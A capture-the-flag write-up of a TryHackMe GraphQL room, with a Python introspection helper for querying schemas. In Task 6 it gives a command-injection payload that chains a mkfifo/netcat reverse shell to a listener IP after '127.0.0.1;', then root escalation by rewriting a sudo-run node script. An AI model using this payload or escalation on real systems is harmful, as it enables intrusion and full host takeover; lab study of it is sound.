GraphQL — TryHackMe (Write-up)


The purpose of this room is to show how a malicious user could use GraphQL to perform unintended actions. You will get the most out of this room if you have some programming experience, as code examples will be shown.


Some Basics

GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools.


Tasks

Tasks 1–2 are reading only: they introduce GraphQL and get you familiar with the environment.

Task 3:

The query takes the form: { Dog(name: "<?>") { <?> } } — the argument selects the dog by name, and the inner braces list the fields you want returned.

Task 4:

Use the built-in introspection type __type. Its name argument specifies the type to inspect; querying its fields returns every field on that type, and from those we can read the field names.

The query takes the form: { __type(name: "<?>") { fields { <?> } } }
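As an added example (not code from the write-up), the two query shapes above can be driven from Python. It goes one step beyond Task 4: the __schema introspection query enumerates every type, its fields and their arguments in a single request, and the result is used to build a Task 3 style object query for Dog. The endpoint, the fields on Dog (id, name, breed), the dog name Rex and the sample JSON response are all constructed for the demonstration. Note that a hardened target may have introspection disabled, in which case __type and __schema return an error rather than the schema.

```python
import json
import urllib.request

# Full introspection query: every type, its fields and each field's arguments.
# This generalizes the Task 4 query ({ __type(name: "...") { fields { name } } })
# to the whole schema in one request.
SCHEMA_QUERY = """
{ __schema { queryType { name }
    types { name kind fields { name args { name type { name kind ofType { name } } } } } } }
"""


def type_fields_query(type_name):
    """Task 4 shape: the fields of one named type via the __type meta-field."""
    return '{ __type(name: %s) { fields { name type { name kind ofType { name } } } } }' % json.dumps(type_name)


def object_query(field, arg, value, subfields):
    """Task 3 shape, e.g. { Dog(name: "Rex") { id name breed } }.
    json.dumps yields a correctly quoted and escaped GraphQL string literal."""
    return "{ %s(%s: %s) { %s } }" % (field, arg, json.dumps(value), " ".join(subfields))


def field_names(type_response):
    """Field names from a __type response; [] if the type is unknown or has no fields."""
    t = type_response["data"]["__type"]
    return [f["name"] for f in (t or {}).get("fields") or []]


def schema_map(schema_response):
    """{type: {field: [arg names]}} for every user-defined object type in a __schema
    response. Introspection types (names starting with '__') and scalars (no fields) are skipped."""
    out = {}
    for t in schema_response["data"]["__schema"]["types"]:
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        out[t["name"]] = {f["name"]: [a["name"] for a in f.get("args") or []] for f in t["fields"]}
    return out


def post_graphql(url, query, variables=None):
    """Send a query to a GraphQL endpoint over HTTP POST (not exercised offline)."""
    body = json.dumps({"query": query, "variables": variables or {}}).encode()
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed sample response (not captured from the room): a Query root with a
# Dog(name: String) field, and a Dog type with made-up fields id, name, breed.
SAMPLE_SCHEMA_RESPONSE = {"data": {"__schema": {"queryType": {"name": "Query"}, "types": [
    {"name": "Query", "kind": "OBJECT", "fields": [
        {"name": "Dog", "args": [{"name": "name", "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]}]},
    {"name": "Dog", "kind": "OBJECT", "fields": [
        {"name": "id", "args": []}, {"name": "name", "args": []}, {"name": "breed", "args": []}]},
    {"name": "String", "kind": "SCALAR", "fields": None},
    {"name": "__Schema", "kind": "OBJECT", "fields": [{"name": "types", "args": []}]},
]}}}


def dog_query_from_schema(schema_response, dog_name):
    """Task 4 feeding Task 3: read Dog's argument and fields from introspection
    and request every field at once."""
    types = schema_map(schema_response)
    (arg,) = types["Query"]["Dog"]          # the single argument the Dog field takes
    return object_query("Dog", arg, dog_name, list(types["Dog"]))


if __name__ == "__main__":
    print(type_fields_query("Dog"))
    print(schema_map(SAMPLE_SCHEMA_RESPONSE))
    print(dog_query_from_schema(SAMPLE_SCHEMA_RESPONSE, "Rex"))
```

Against a live target you would call post_graphql(url, SCHEMA_QUERY) and feed the response to dog_query_from_schema; the constructed SAMPLE_SCHEMA_RESPONSE stands in for that response so the flow runs offline.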

Task 6:

Let’s try some injection…

  1. To get a reverse shell, start a listener on your attacking machine first (for example nc -lvnp 4242), then use the payload: "127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f" (replace 10.0.0.1 4242 with your listener's IP and port). The leading 127.0.0.1 keeps the intended command valid; everything after the ; is executed as a second command.
  2. Once you have the shell, do the privilege escalation. Enumerate first (sudo -l is the obvious check); the steps below rely on being able to run /usr/bin/node as root via sudo on /home/para/server.js, as the command in step 4 does.
  3. Replace /home/para/server.js with your own payload; whatever that file contains will run as root in the next step.
  4. sudo -u root /usr/bin/node /home/para/server.js
  5. Go and get the flag.


More Information

  1. https://www.exploit-db.com/docs/49728